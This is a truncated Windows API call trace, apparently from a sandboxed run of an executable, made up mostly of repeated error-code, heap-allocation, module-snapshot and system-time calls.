GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.302] GetLastError () returned 0x0 [0118.302] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x0, Size=0x68) returned 0x1de1990 [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.303] SetLastError (dwErrCode=0x0) [0118.303] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.304] SetLastError (dwErrCode=0x0) [0118.304] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.305] SetLastError (dwErrCode=0x0) [0118.305] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.306] SetLastError (dwErrCode=0x0) [0118.306] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.307] SetLastError (dwErrCode=0x0) [0118.307] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.308] SetLastError (dwErrCode=0x0) [0118.308] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.309] SetLastError (dwErrCode=0x0) [0118.309] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.310] SetLastError (dwErrCode=0x0) [0118.310] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.311] GetLastError () returned 0x0 [0118.311] SetLastError (dwErrCode=0x0) [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x98) returned 0x1de1a00 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x1f) returned 0x1de1aa0 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x36) returned 0x1de1ac8 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x37) returned 0x1de1b08 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x3c) returned 0x1de1b48 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x31) returned 0x1de1b90 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x17) returned 0x1de1bd0 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x24) returned 0x1de1bf0 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x14) returned 0x1de1c20 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0xd) returned 0x1de1c40 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x25) returned 0x1de1c58 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x39) returned 0x1de1c88 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x18) returned 0x1de1cd0 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x17) returned 0x1de1cf0 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0xe) returned 0x1de1d10 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x69) returned 0x1de1d28 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x3e) returned 0x1de1da0 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x1b) returned 0x1de1de8 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x1d) returned 0x1de1e10 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x48) returned 0x1de1e38 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x12) returned 0x1de1e88 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x18) returned 0x1de1ea8 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x1b) returned 0x1de1ec8 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x24) returned 0x1de1ef0 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x29) returned 0x1de1f20 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x1e) returned 0x1de1f58 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x41) returned 0x1de1f80 [0118.312] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x17) returned 0x1de1fd0 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0xf) returned 0x1de1ff0 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x16) returned 0x1de2008 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x2a) returned 0x1de2028 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x29) returned 0x1de2060 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x15) returned 0x1de2098 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x1e) returned 0x1de20b8 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x2a) returned 0x1de20e0 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x12) returned 0x1de2118 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x18) returned 0x1de2138 [0118.313] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x46) returned 0x1de2158 [0118.313] HeapFree (in: hHeap=0x1de0000, dwFlags=0x0, lpMem=0x1de11f8 | out: hHeap=0x1de0000) returned 1 [0118.314] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x800) returned 0x1de21a8 [0118.314] RtlAllocateHeap (HeapHandle=0x1de0000, Flags=0x8, Size=0x80) returned 0x1de11f8 [0118.314] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x404e49) returned 0x0 [0118.315] RtlSizeHeap (HeapHandle=0x1de0000, Flags=0x0, MemoryPointer=0x1de11f8) returned 0x80 [0118.315] GetLastError () returned 0x0 [0118.315] SetLastError (dwErrCode=0x0) [0118.315] GetLastError () returned 0x0 [0118.315] SetLastError (dwErrCode=0x0) [0118.315] GetLastError () returned 0x0 [0118.315] SetLastError (dwErrCode=0x0) [0118.315] GetLastError () returned 0x0 [0118.315] SetLastError (dwErrCode=0x0) [0118.315] GetLastError () returned 0x0 [0118.315] SetLastError (dwErrCode=0x0) [0118.315] GetLastError () returned 0x0 [0118.315] SetLastError (dwErrCode=0x0) [0118.316] GetLastError () returned 0x0 [0118.316] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.364] GetLastError () returned 0x0 [0118.364] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.365] GetLastError () returned 0x0 [0118.365] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.366] SetLastError (dwErrCode=0x0) [0118.366] GetLastError () returned 0x0 [0118.367] SetLastError (dwErrCode=0x0) [0118.367] GetLastError () returned 0x0 [0118.367] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x76d30000 [0118.367] GetProcAddress (hModule=0x76d30000, lpProcName="CreateToolhelp32Snapshot") returned 0x76d6735f [0118.367] GetProcAddress (hModule=0x76d30000, lpProcName="Module32FirstW") returned 0x76d679f9 [0118.367] CreateToolhelp32Snapshot (dwFlags=0x8, th32ProcessID=0x0) returned 0x78 [0118.370] Module32FirstW (hSnapshot=0x78, lpme=0x18fac8) returned 0 [0118.370] PeekMessageA (in: lpMsg=0x18fa44, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x0 | out: lpMsg=0x18fa44) returned 0 [0118.370] GetTickCount () returned 0x114f9ba [0118.370] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.370] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.371] GetACP () returned 0x4e4 [0118.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.371] GetACP () returned 0x4e4 [0118.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.371] GetACP () returned 0x4e4 [0118.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.371] GetACP () returned 0x4e4 [0118.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.371] GetACP () returned 0x4e4 [0118.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.371] GetACP () returned 0x4e4 [0118.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.371] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.371] GetACP () returned 0x4e4 [0118.371] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.372] GetACP () returned 0x4e4 [0118.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.372] GetACP () returned 0x4e4 [0118.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.372] GetACP () returned 0x4e4 [0118.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.372] GetACP () returned 0x4e4 [0118.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.372] GetACP () returned 0x4e4 [0118.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.372] GetACP () returned 0x4e4 [0118.372] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.372] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.373] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.373] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.373] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c | out: lpIdleTime=0x18fa9c, lpKernelTime=0x18fa34, lpUserTime=0x18fa3c) returned 1 [0118.374] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa80 | out: lpCPInfo=0x18fa80) returned 1 [0118.374] GetACP () returned 0x4e4 [0118.374] GetSystemTimes (in: lpIdleTime=0x18fa9c, 